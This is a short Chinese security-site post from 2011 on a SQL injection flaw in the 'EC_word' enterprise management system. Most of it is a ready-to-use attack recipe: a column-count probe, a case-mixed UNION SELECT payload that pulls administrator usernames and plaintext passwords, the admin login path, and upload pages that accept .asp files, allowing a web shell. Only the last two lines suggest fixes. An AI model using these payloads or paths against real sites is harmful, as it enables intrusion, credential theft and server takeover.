EC_word企业管理系统注入漏洞及修复
文章录入:叶孤城 责任编辑:2cto.com 更新时间:2011-7-9 10:49:07 41
【字体:小 大】
该程序采用枫叶通用防注入1.0asp版,此防注入完全鸡肋,该网站程序pro_show.asp有COOKIEs注入或者变型注入,注入前可以先判断一下字段数:ORdeR By xx
注入语句:ANd 1=1 UNiOn SElEcT 1,username,3,4,5,6,7,8,9,10,password1,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FrOm lei_admin
密码为明文,后台地址:admin/index/login.asp
后台上传地址:admin/inc/upfile.htm 可直接上传asp文件 上传路径admin/upimg/
有些后台有双文件上传漏洞:admin/inc/upfiletwo.asp
有些后台还有eweb编辑器
from:红科网安
www.2cto.com提供修复策略:换用其他通用防注入或过滤pro_show.asp。上传漏洞亦须修复,禁止asp文件上传
编辑器安全注意修复